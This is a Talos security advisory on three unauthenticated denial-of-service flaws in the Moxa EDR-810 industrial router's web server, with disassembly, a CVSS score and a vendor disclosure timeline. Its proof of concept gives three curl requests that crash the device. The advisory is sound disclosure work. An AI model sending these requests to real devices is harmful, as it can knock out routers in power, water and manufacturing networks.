Moxa EDR-810 Web Server strcmp Multiple Denial of Service Vulnerabilities

2018-04-13T00:00:00
ID TALOS-2017-0474
Type talos
Reporter Talos Intelligence
Modified 2018-04-13T00:00:00

Description

Talos Vulnerability Report

TALOS-2017-0474

Moxa EDR-810 Web Server strcmp Multiple Denial of Service Vulnerabilities

April 13, 2018
CVE Number

CVE-2017-14435, CVE-2017-14436, CVE-2017-14437

Summary

An exploitable denial of service vulnerability exists in the web server functionality of Moxa EDR-810 V4.1 build 17030317. A specially crafted HTTP URI can cause a null pointer dereference resulting in denial of service. An attacker can send a GET request to “/MOXA_LOG.ini, /MOXA_CFG.ini, or /MOXA_CFG2.ini” without a cookie header to trigger this vulnerability.

Tested Versions

Moxa EDR-810 V4.1 build 17030317

Product URLs

<https://www.moxa.com/product/EDR-810.htm>

CVSSv3 Score

7.5 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CWE

CWE-476 - NULL Pointer Dereference

Details

This device is marketed as a secure ICS (Industrial Control System) router. This device will likely be found in industrial environments such as power generation/distribution, water treatment, manufacturing, etc. This specific vulnerability causes the web server to crash.

A GET request to /MOXA_LOG.ini, /MOXA_CFG.ini, or /MOXA_CFG2.ini without a cookie header will cause the binary to crash. Authentication is not required for this vulnerability.

CVE-2017-14435 - /MOXA_CFG.ini

In the following code snippet, R0 is nil if the cookie header is not set. .text:0001B544 LDR R0, [R11,#s1] ; s1 .text:0001B548 LDR R1, =aMoxa_cfg_ini_0 ; “/MOXA_CFG.ini” .text:0001B54C BL strcmp

CVE-2017-14436 - /MOXA_CFG2.ini

In the following code snippet, R0 is nil if the cookie header is not set. .text:0001B55C LDR R0, [R11,#s1] ; s1 .text:0001B560 LDR R1, =aMoxa_cfg2_ini ; “/MOXA_CFG2.ini” .text:0001B564 BL strcmp

CVE-2017-14437 - /MOXA_LOG.ini

In the following code snippet, R0 is nil if the cookie header is not set. .text:0001B574 LDR R0, [R11,#s1] ; s1 .text:0001B578 LDR R1, =aMoxa_log_ini_0 ; “/MOXA_LOG.ini” .text:0001B57C BL strcmp

Exploit Proof-of-Concept

curl -v 192.168.127.254/MOXA_LOG.ini OR
curl -v 192.168.127.254/MOXA_CFG.ini OR 
curl -v 192.168.127.254/MOXA_CFG2.ini

Timeline

2017-11-15 - Vendor Disclosure
2017-11-19 - Vendor Acknowledged
2017-12-25 - Vendor provided timeline for fix (Feb 2018)
2018-01-04 - Timeline pushed to mid-March per vendor
2018-03-24 - Talos follow up with vendor for release timeline
2018-03-26 - Timeline pushed to 4/13/18 per vendor
2018-04-12 - Vendor patched & published new firmware on website
2018-04-13 - Public Release

Credit

Discovered by Carlos Pacho of Cisco Talos.


Vulnerability Reports Next Report

TALOS-2017-0475

Previous Report

TALOS-2017-0473